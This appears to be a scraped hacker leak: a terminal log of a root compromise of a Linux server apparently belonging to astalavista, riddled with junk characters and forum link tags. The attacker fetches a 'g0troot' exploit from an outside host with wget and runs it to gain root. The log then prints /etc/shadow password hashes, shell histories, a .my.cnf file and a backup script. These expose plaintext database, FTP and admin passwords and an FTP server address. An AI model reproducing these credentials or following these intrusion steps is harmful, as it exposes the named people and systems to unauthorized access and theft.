, \/ t7 `$ j7 y' ~% tsh-3.2$ uname -a
/ e3 u. k! k+ Z3 rLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
7 f! m) ~. m3 \0 [' Hsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
: R# Z% A8 S% n, N  R& m–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]& H1 n: z4 k" A/ w  I
Resolving anti.sec.labs… 13.33.33.37
# H- E# l; [; H) _Connecting to anti.sec.labs|13.33.33.37|:80… connected.
; f8 A2 a5 x1 V( ^HTTP request sent, awaiting response… 200 OK
! |7 G0 ^- R0 v' k0 i8 |Length: 18200 (18K) [text/plain]- h+ e  ?- Z5 i* i
Saving to: `g0troot’
9 [; c0 x* r/ O. z+ V6 O2 i3 Q* {4 q0 D; Z0 n6 u  s
100%[=========================================================================================================================================>] 18,200      58.6K/s   in+ `" \4 `5 Q) G4 l: F
0.3s
! l+ W: P) o! F3 w! R1 n: o9 w% ]& D2 i) v: Y
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]7 ?# V, s  G- P8 n. H3 B9 f
" _7 k6 m9 b, G- n
sh-3.2$ ./g0troot -i x86_64
! D% j3 i! _# t- Q  J! \! q[+] g0troot - anti.sec.labs
) v7 t$ e! T4 r% Y' R[+] Target: 2.6.18-128.1.10.el5! ~/ T' P, K5 Y: L
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
, V% U! G" P  F9 f- a4 m
9 F6 a2 ^) Y$ Q: `7 B[+] r00tr00t* j: g+ h& X4 Y  C" F
[~] Executing shell…
) P8 l3 Y; {" E$ Z$ K) F" r( N9 _$ y4 ^3 J4 i- L9 _. w
sh-3.2# id2 I8 K3 L9 J' ]( u9 c! M
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)' Y0 K8 f. R& `7 k; m
- i" ~, R, \9 Q/ W' b
sh-3.2# cat /etc/shadow; N5 r5 F+ Y  p+ j" h
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
4 I# t) [9 s! ?. V+ D[snip]* P+ ?5 R5 q5 j1 k$ e- V7 L  v
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::" X2 s; n8 D4 B% h% [  C
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::, }' j# v8 X  m5 W. o, i' q& W
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
5 f8 C, t% _8 W7 ~6 I% zastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
2 [' B0 C9 S3 C$ a- p6 }' [( N/ I( |9 s
sh-3.2# cat /etc/motd. J5 f5 n9 r' i" |1 ^) [  T- ?2 F
#####################################################
8 B" W1 Y5 D" E! B0 _/ q#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #5 P0 a, @* Y5 d9 \8 h
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #9 [5 S$ H( L/ A$ K: c& H
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
9 T3 w: z. A7 Q) H( R; [#                                                   #. j& O% o& a+ p! A! D! S0 \% e
#####################################################  U5 B% B6 [' P
#                                                   #
) ~$ \/ E! B' z: G7 t4 w# Admin Contact - 链接标记support@secureservertech.com      #5 v% e5 z1 n. t* j
#                                                   #
8 M! K9 K* C/ t- e4 V# B; D; i0 o# Available ShortCuts                               #, j9 b& I' O; a: j
#                                                   #
% P' |6 Z: Z) U( \3 ]# nst -  list active connections                    #
0 L& d$ F) @/ F' m0 N# ddos - shows how many times each ip is connected  #) V) `: }" U. p
# ltr -  restart the webserver                      #% D% w; C+ c  |
# phpc - edit the php config file                   #/ L% X& X! t3 M. J' u
# htc -  edit the webserver configuration file      #0 W0 b: G. U: V0 j( b
# up -   uptime                                     #' \" F+ z9 f: E! Q1 Z) C
# etd - edit the motd of the day file               #
4 {( s. c9 g0 P* m/ R# htr - start and restart apache if needed          ## T0 p3 W1 o7 `" k% v0 d' v3 m2 w! g
# syng - shows active SYN_RECV connections          #
0 ^) b/ g% Y1 t. u8 p# synd - syn flood blocker - “synd -h” for usage    #, r; r& D* V+ l! x. x2 s
#####################################################
, F" _, y" P% d, X5 f# NOTES:                                            #" M6 |0 ~  e$ ~9 S9 V
# Last Upgrade - 12-08-2008 by JF                   #
7 o# C3 V2 w! c% {5 _7 }: E: ^# My.cnf/Mysql Optimization - 1-28-09               #$ y) V6 r' Z2 E6 Q, v
#                                                   #3 }7 @* f6 O. a& n$ G7 K
#                                                   #
$ `' I- b5 J) _9 p& s#                                                   #
, [, L$ @$ Y) w1 |% u4 _: W$ W#####################################################
8 }4 c  F: _1 t" A; x6 e, `9 u0 _4 r
sh-3.2# lastlog | grep -v Never
  I4 L! W4 R" OUsername         Port     From             Latest
5 r' ?' B0 s% _5 f5 yroot             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
- P  t+ |  B* z+ `2 i2 g6 e& Wadmin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008/ X1 V% F4 d% T' V# {
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
3 W9 t) h7 E) n+ j0 @6 dastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
  Q6 h+ h* s+ V7 {4 O! R1 B" |5 `  P; z( L& i; g) j
sh-3.2# ls -la% i1 j7 G  M, l5 h* E/ w: z
total 453376! t5 u$ ~9 Y! x6 h% o" n; Z2 _
drwxr-x— 15 root root       4096 Jun  4 08:40 .
2 U7 y' e4 }1 c2 E6 F8 idrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
& V3 P/ k: m/ o& }8 A, @- k-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
0 V% B3 G- N. A. k; T# w7 X" U-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg/ z% t  U4 _1 }' x/ `  X8 a. {
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history# k) l$ S9 K! T5 K
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout' s9 x- B' s0 T+ d6 z0 H" X
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile, L7 S0 W: `0 v: H- t6 v( ]% O
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
" w8 m5 ]7 t. ~- Z" R4 Q+ @-rwx——  1 root root       1899 Oct 28  2007 bk.sh
  q2 ]7 N5 w# C8 v! e-rw-r–r–  1 root root       1327 Nov 29  2007 cert2 }, w6 h1 y3 ~% r& _5 ^- ?& v( M
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
% E+ k% F" l* _+ f4 r& sdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan  \% k* u: t- e: \& f* T1 k
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
/ W+ O9 e7 L# B9 l; \-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql5 e( v/ c" J8 y* \. j* {: U
drwx——  2 root root       4096 Oct 28  2007 .elinks
& P2 C8 D- C/ l$ S  B5 [drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.14 q3 F* t# o/ G; R
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz24 r1 T/ {6 E5 g% m4 o' H
-rw——-  1 root root          0 Apr 16 13:19 .history
( f+ K* m, x3 v3 z: T* N! a: Z-rw-r–r–  1 root root      16095 Sep 11  2007 install.log/ L  n8 _$ Z8 m/ }) X+ {+ L
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog& r# n9 [- K, I  Z' d
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh: E/ F% w, Z. @7 s
-rw——-  1 root root         35 Jun  2 14:23 .lesshst
6 y* U! g1 a0 a# b) Q2 H- U8 adrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp4 b3 G* B$ A, D0 R8 V
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
) Z7 E: v4 }- x! o- v0 y-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
' u* q1 `- {3 i% f3 h, ?; W-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2; R# R" _; @* y# x+ p+ B
-rwx——  1 root root        760 Sep 18  2008 lp+ F+ O0 @( `- C5 t; K/ I+ B" Z
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1) b# ]# h! q: w. g4 q
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz/ f7 N! l0 a  ^+ E
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.10 `, J1 @) [, w2 f4 o
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
3 y! G5 U, F  v% l. \0 Q' Z-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
/ N6 I! e0 v- bdrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
! \( f! @  s" m4 ]1 y3 P) D& k+ y-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz$ E& G5 B7 q2 {) M+ _
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh  A6 X* U# A0 z, E
-rw——-  1 root root         41 Oct 19  2007 .my.cnf
4 Q3 q2 R8 Q) A+ ~3 w-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
& |$ m9 U6 [% E! a/ ]-rwx——  1 root root      38873 Apr 16  2008 mysqlreport' V0 i, H, j; C* g4 ?. t2 d5 [
-rw——-  1 root root         41 May 20  2008 .mytop
3 D+ V! Q) Q' v" S* N# `drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.60 B; r7 r8 ~& f0 d
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
. H' u; f. S% C+ A8 U4 K7 rdrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
$ S+ n# A/ i. c-rw——-  1 root root       1462 Sep 21  2007 opt.php! Z6 a# P- b7 G' O# T% J
-rw-r–r–  1 root root       3371 Sep 22  2007 p  L4 \: R* ]2 G
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
; ]3 L2 q$ q: l7 p/ |# L6 z-rw——-  1 root root       1024 Feb  3 21:32 .rnd
3 }5 a1 u8 P, c: T) d-rw-r–r–  1 root root        716 Nov 28  2007 server.csr) Q$ C9 ~, f: x! X) c, Z
-rw-r–r–  1 root root        887 Nov 28  2007 server.key
# Y4 T8 L4 C' V# O  c" v' N% q, ldrwx——  2 root root       4096 Oct 10  2008 .ssh
+ ?4 {1 G& X9 v% ~) a0 @6 a+ i-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
5 F1 v8 N" }3 |* J-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
) R/ m4 k/ I& |2 r8 S! O-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
# y/ d8 V: k: r8 z-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.18 T2 k& L& O3 u2 ?0 i) R
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
7 \5 L4 k! o- g7 L; E+ v" p; e- w' A-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh) {3 ?0 q# G' H% ]8 d! {
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
( |+ B' A7 |& R% u/ N  C-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
) o" h- j' U+ }  r-rw——-  1 root root      12997 May 16  2008 .viminfo1 d: p8 L! k/ l2 C
( d* k4 C5 ^' x5 L/ P
sh-3.2# cat .bash_history
1 c7 W# ^8 p5 i( P: I[snip]
, E$ T2 V2 V9 j" ?2 hwget cp4sst.com/sstlinux.tar.gz# q# w- y2 ^& H6 Z5 K+ A! l/ U$ m
tar zxvf sstlinux.tar.gz
4 ?$ T7 q3 \$ s0 t3 _7 h# O5 J2 ycd linux-2.6.27.10) h2 W3 P+ {/ }  h8 [
sh install.sh
  R; h" _0 X  K' ^make bzImage ; make modules ; make modules_install ; make install3 ]8 z9 v+ ?# s* a
make clean4 |9 ~8 A$ I' g7 y
service mysqld restart
! Q+ |$ k. s  `" d4 @; B8 a[snip]
  C9 b( Z, P. X( _( f5 Lcd /usr/sbin/- M0 u0 p% z5 p: y  h
chmod 4777 traceroute1 V$ `2 p# x/ R1 O
chmod 4777 ping
2 f) ?( T+ |1 g9 W  k: E; Gtraceroute -I 链接标记[url]www.astalavista.ch[/url]7 Y* G3 s. }1 F9 f$ n
[snip]
* C' ]: w. i# ^, u( q$ jvi /etc/csf/csf.conf# `1 Y( U$ V, L
traceroute google.ch
1 }' O9 F$ E: |+ b9 w/ hservice csf restart) S( ]  a$ K- t) X) ~& A
tracert google.ch) G/ f0 D- i- U  \
service csf restart
9 U2 n% b& ?+ N, N3 ntraceroute 链接标记[url]www.google.ch[/url]& M% z  v8 S  k1 x( y
tracert 链接标记[url]www.google.ch[/url]2 ]8 Q# w4 U+ }/ @% }
traceroute 链接标记[url]www.google.ch[/url]4 m+ t) C. l" ]% p
locate traceroute
2 q# l% A3 O; rchown 4755 /bin/traceroute
/ n; M( m' e6 k- N/ a7 k$ j2 Zchown 4777 /bin/traceroute
8 x" d6 d4 `2 k3 H, A$ J' {locate ping% j$ W: T5 }/ }$ O  u
chown 4755 /bin/ping
8 M  [# a9 Z+ g1 g2 xchown 4777 /bin/ping
4 L/ q6 P4 I3 R8 \cd /bin/8 ~+ |4 T: S. ?7 J4 y5 _3 o4 {
ls -ali | grep ping
: x6 y' e  i- |chown root ping
' r5 g; r2 p, ]. ~chmod 4755 ping
+ u' _3 l) F: i1 R, S4 g3 \ls -ali | grep traceroute
2 Z8 M" P& W) N! q2 s( C0 wchown root traceroute/ w$ N" V  V9 P4 ~0 C
chmod 4755 traceroute9 l( l4 r' j9 o
ls -ali | grep traceroute
* |: \9 g2 c7 K" }traceroute -I 链接标记[url]www.google.ch[/url]
5 c( B5 P) M: _7 ^traceroute 链接标记[url]www.google.ch[/url]/ w( B# Q+ u: M( F1 r0 Q9 z
whois pmsantos.ch
3 F( k0 i2 d" K# }  O% _[snip]6 A- U, H/ D& t2 {
mysql -h com_contrexx2_live < /root/defaultp_ports.sql  z8 q' j6 I8 ?7 d7 `
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' f6 w1 C) [. B$ a- v% ]! v" g$ X9 K
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql5 q$ I1 o7 `- z" W/ i
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
0 \  i* n# v4 `7 J8 Ytop
& ?/ Q3 r! t& e# _. lping ssth.ch) [: h1 e# C/ X& m5 t
ping asdlkfaljgasd???ljg???lasj.ch; L# T- g* p( v9 k, J
ping asdlkfaljgasdlasj.ch' J7 l) D( o2 v6 n9 Y3 h  L
ping 链接标记[url]www.ssth.ch[/url]
* Z- D  _! _0 W4 c! ]) T4 Q$ t  jping ssth.ch/ d/ r* P8 n& ~: E; O# Z( l
nslookup 链接标记[url]www.google.ch[/url]- n. p) Q& I% A$ a+ y- I! P
nslookup 链接标记[url]www.ssth.ch[/url]
! K0 O9 }5 a8 K% T4 {. L. x+ i, ~man nslookup
3 E  P/ d+ \- S4 W/ G( e) Y( Oping 链接标记[url]www.google.ch[/url]) _( u7 O8 ~2 G4 l% ]
nslookup 链接标记[url]www.google.ch[/url]
+ X  J% v, V  G' _' anslookup 链接标记[url]www.google.ch[/url]# c# i5 J4 |+ T( E1 B1 C$ }9 [
nslookup salfjasdlf.ch
+ k, X1 j# H* P, E2 ~! z- ~[snip]
1 ]3 T9 P) z5 P6 x: Fopenssl passwd -1 sadf
: X/ C; o* I' F7 H: K: w' L. gopenssl passwd -1 5cZNHstdTy7 E2 ^6 |1 l; Q
mysql
. \. i# J( b) Vmysql6 X! B# m$ Y! @: u
locate proftp
% V  H" ^2 U3 l: n$ P' u  Jvi /etc/proftpd.passwd
" y, r3 Q# r1 B0 H( B+ Rservice proftpd restart6 M3 e/ P6 b1 m% {
locate proftpd.conf# a! a$ R4 S% @9 z/ f
vi /etc/proftpd.conf% A& _) k! H* D3 a6 A% `
vi /etc/proftpd.passwd& |7 D" b2 g* W& W7 L
service proftpd restart
8 a  F" b* p. u. C[snip]8 V7 ^# S( x6 f% H  D2 V4 I
/bin/sh /home/com/backup_system/backup.sh
1 r  v' k6 @+ e: k. rtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
6 Q6 u" M; h/ M( y5 V( @mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
1 c/ }- `$ c" {+ \( Emysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql, p5 A) B7 T; y' X. k
ls -ali; I6 B0 R. v' L0 t- f
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql9 q& f" u0 ~# m
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql% `9 h# |1 Q) e, C* t4 I' C
crontab -l
5 A7 _/ s* Z- P0 J0 wcrontab -l
, V8 i- F6 `$ z4 a* u, [php -q /home/com/public_html/modifications/cronjobs/securitynews.php
6 f* b9 X2 y* ^# a! i/home/com/public_html/modifications/cronjobs/exploits.sh; K2 }+ w+ I. m- N! |
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
/ O" \" {6 u) K- E2 r4 Ztar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
1 U  F/ R; Q# u( y# _cd lsws-4.0.3
. m0 N. o8 j$ e. ^$ [! Ssh install.sh# }+ J6 V0 D3 g8 H
uptime
! U  J% Q& f7 E' B: @6 O1 {! l0 }hdparm -tt /dev/sda
! s- j, c5 g- D+ R- {+ Biostat
8 h: n5 ]8 ~/ f  p. d) \: s  oyum install iostat/ q8 m5 e4 o& q' m$ M( f
iostat( \% _; f" w) g/ c) Z9 m' m
whereis iostat  u# C9 E% U! y. i; P+ I# T
yjm clean all- x& i+ U; H) N/ u
yum clean all ; yum -y update6 n" c- ]. R9 w2 T2 C
iostat
& \" I- ^6 \" T6 |7 e  byum install systat+ G  Z+ l8 R( W4 j, L; |$ T8 G
rpm -qa | grep iostat
. R3 M0 D( D; z8 J- X2 ?$ L9 p* X+ _rpm -qa | grep sysstat' P" C: X$ i  \' M1 P+ l
rpm -qa | grep systat
( Z1 h0 q  P8 N, ^0 w  Zdmesg -c  w: `, N6 E/ i, a& R: O/ F, C
sysctl -p
" e: s& T" D; ?3 Y3 ]6 G: z7 Xuname -r
$ h  H* s2 O7 O* z% E0 S5 |cd /usr/src+ ?3 R6 j- w& j
wget nix101.com/kernels/sstlinux.tar.gz. C7 a& \1 Z- O* I2 U8 P3 i: G
shutdown -r now) W) Q4 a0 u; Y' ]/ V, [
nano -w /boot/grub/grub.conf. w0 Z( ^+ i( j2 R: A: p2 W! b

& ~3 X6 q5 L0 Ssh-3.2# cat .my.cnf; T: D3 x! O# @" ^' G
[client]4 B2 \1 ~3 ]8 c1 x$ U+ D3 P
user=da_admin* M+ @8 T# u- U, X3 p9 c# d
password=X9dctmRH
, o5 N0 |  d. Z3 M& p! }+ @1 T9 K) s" J5 }2 w/ f2 A$ [3 P
sh-3.2# cat /home/com/backup_system/backup.sh
3 O2 C- D6 c  |  N4 P. S0 y' M#!/bin/sh
% u& m/ n  b7 p6 F3 ~* y  b1 x#####################################################################- ^( u% }' C: D3 n9 A
#                                                                   #; |5 [- J6 l' O# e. Y, F5 C
#   incremental backup for astalavista.com                          #( Y& S" m6 N6 \# R  C& _; O
#                                                                   #2 K6 ~, ^: n& K* O( }
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #, F; e/ ?) A2 N
#                                                                   #
0 F2 ~% Z# n4 ]3 ]& e4 h4 w#####################################################################/ {* c, W* L2 R4 A7 q( v
[snip]
  N) i& q/ q9 K9 C7 EPROG_DIR=”/home/com/backup_system”;. }# {4 y0 C/ q" U' {# ^% h
BACKUP_DIR=”/home/com/backups”;2 T" Q: d! P/ K  }7 t& R
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;) r- h: T% p2 _  [! ~/ x: g' @* B
# ftp for synology backup server# K& _( t& N, T1 E
FTP_HOST=”212.254.194.163″;
' ?- @' {* g" ^* {FTP_PORT=”21″;2 {, B2 I' w# t: {2 {: M
FTP_USER=”astalavista.com”;8 Y& E/ W9 D( S1 a0 F
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
! _& Z. {8 J) f1 lFTP_DIR=”/astalavista.com”;5 q$ s1 O/ A% @  H+ t% d
# database
! M$ o* u$ F$ e, i. S+ |DB_HOST=”localhost”;4 X. z8 W5 T, ?) O7 a) {
DB_USER=”contrexxuser2″;7 G- i% J0 t% b3 e  J
DB_PASS=”0fEYNZgXz1pKe”;
4 t+ }3 x, d: I* MDB_DATABASE1=”com_contrexx2_live”;
. q: }/ H# R+ h4 N: [DB_DATABASE2=”com_contrexx2″;
# @; d& N5 c& c4 W5 Z: t9 c& g9 T[snip]' j2 `1 O, s. Z9 W: l9 K9 l
ftp -in $FTP_HOST $FTP_PORT <<EOF
3 M. k, E. L& d6 q# X, A9 n) S) P7 iquote USER $FTP_USER6 }- i: W0 F: f6 S) n
quote PASS $FTP_PASS
1 L0 [) ?! y4 _8 ~1 @cd $FTP_DIR
, j: s% J) y3 v2 K- o5 Nput $DB_FULLNAME-SQL_Dump.tar# u1 P2 q: Y4 v3 a. |9 s
put $BACKUP_FULLNAME-Public_HTML.tar
" X& ~: ?- a' b5 Q. t/ iclose" |1 [& `/ {. p4 o/ M" {/ v
bye
& Q+ V6 a# K, W% v: aEOF0 R- F& Z: X# m" ]1 K

" d* E# m2 Z0 s0 `sh-3.2# cd /home
. ?8 @. X" k0 q: Dsh-3.2# ls -la) ^0 p, {8 L1 i4 i5 L
total 120
; F6 _% B& i2 Y; _: w: Kdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .. \1 Z7 W& x  Z- e3 M  }  C7 E
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..8 F+ P  J- ]+ x! F  h/ e
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
- K- u! X- F7 m+ u% M5 r/ A( U-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
. U2 Q7 F3 A/ O9 Y! g" z4 E-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user% X6 D5 `  F! Q
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
. M9 M9 M. D9 Sdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup2 V7 Z  m8 T8 U* [
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
- g+ c  t% c$ g6 w- f; _  H1 _8 edrwx–x–x 10 com     com      4096 Apr 28 12:40 com! B0 }5 G. c. n& P% B% O( R' q8 O
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp6 F; T& n0 \, j$ D% d: f! L! Z- V
drwx——  3 jon     jon      4096 Sep 21  2007 jon
3 y& z( D4 A5 i5 k+ |5 F4 M) adrwx——  2 root    root    16384 Sep 11  2007 lost+found
: @5 q$ Y: R- ^drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
$ d' r9 Z7 d( ~5 `, z$ Q9 {: Odrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata5 t# {. ?$ b( A9 x
drwx——  2 jon     jon      4096 Sep 15  2007 test
' \$ A- m/ u8 R1 Xdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp6 R# M( [+ B  x& r: O- ~
3 }2 t% j( J$ d" f) ]
sh-3.2# cd admin
# F9 D& e" K3 l0 B# q5 `- y, qsh-3.2# ls -la% E3 c# z9 C0 F* g0 R1 u! _
total 1735896
- G+ {4 r" A9 T* m% s0 {1 ^# kdrwx–x–x  9 admin admin       4096 Nov 28  2007 .
1 a$ C9 A- M) i# l! n2 T0 e" Tdrwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..2 t# x  c7 V/ X7 s: G- d2 F
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
4 H4 i! K! c8 idrwx——  2 admin admin       4096 Sep 28  2007 backups* Y+ F' j" v8 H
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
# p$ {$ ^' @/ q-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
* f+ A/ L9 \& h% M$ m% d-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
2 i+ V  E" J5 O7 d, c  L! o9 Y! o8 i-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
3 J4 Z! N5 \6 j$ ?drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
. M/ M. \7 w. G. V2 \drwx–x–x  6 admin admin       4096 Sep 21  2007 domains1 g5 [7 L" ]) L( F
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap/ A! {0 b6 ?+ s7 A* @4 f( {) v: D
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php$ i6 g' m* E: ]; E
drwx——  2 admin admin       4096 Sep 21  2007 mail
/ V& f( V! R5 l; Q1 h-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr, w5 C: E; S: r- b- x/ W/ D
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key' A( x; G1 M5 n" C
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
2 ^- H8 O" f3 l-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz# T. v7 ?+ d4 r) {- \# f
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups+ v7 G' ~# Q' G& J6 u
4 S$ L; J1 K: R5 \2 A4 Q* x0 n! b+ |5 y
sh-3.2# ..
. _, a+ I2 e' Bsh-3.2# cd jon' i- u4 ]% J: l
sh-3.2# ls -la( m0 u5 F& b- x
total 364 I5 a! w5 j* ~0 N$ T
drwx——  3 jon  jon  4096 Sep 21  2007 .
' \7 n- O4 d1 M' b5 Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..  x# e. N0 G) N: _; R8 Q7 I
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history- B6 M% Z3 w- K, V& @7 t
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout& `# ~8 D+ `) ~+ K6 I
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile% h8 G, U& J8 ^+ X
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
* T! l0 B4 m4 z6 Z8 R& l) B1 c-rw-r–r–  1 root root   24 Sep 21  2007 info.php+ D- j4 o9 _# `2 N9 r) N
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html4 C; u, }0 V3 U- Z# ^" X
6 k: _! k: S! t5 y* n
sh-3.2# cd ..
" p3 H9 J; _+ Qsh-3.2# cd test+ k# Q5 g0 ^7 _
sh-3.2# ls -la
' e- h! }+ W" j  ytotal 48) H5 Q; U4 p4 ^# o; u1 m2 f# A
drwx——  2 jon  jon  4096 Sep 15  2007 .
( ]' d  j! y, n' [9 ?$ y8 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 L$ {0 e5 u0 v
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history7 S7 }$ M: a* T8 s8 W
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
8 Z! y6 H7 [7 s+ d-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
: m6 @/ \) v) S# e$ R/ G-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc- _  H9 n/ Z+ r/ C3 H- ^. R
sh-3.2# cat .bash_history
4 n$ D9 m, n9 N- Z" D6 {5 Y& {/usr/bin/mysqladmin -u root password PoliuJhytg67
2 S# `2 B5 {. j  @8 G6 ^4 P+ x6 O, j
sh-3.2# cd ..
( c4 h+ {% S8 |- ysh-3.2# cd astanet( u- R+ `2 J+ C; e8 g% Y. K# W
sh-3.2# ls -la: F5 J2 A: X# D
total 52
) m$ A0 p3 f- e- [* t$ jdrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
! u# j8 E, x& j" R! B8 j5 sdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..! B# Q5 M5 Y2 N! C1 C; _- S0 q
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
, N5 c8 {; ~. Y-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
2 P& j8 o/ `5 f) }0 x-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
3 d* O2 z8 r+ m-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
. }% c& j+ b1 a% C/ K' Z9 i9 `! i-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc( k1 f7 Y5 p* i
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains: H: G& {1 q; D  z0 _& S
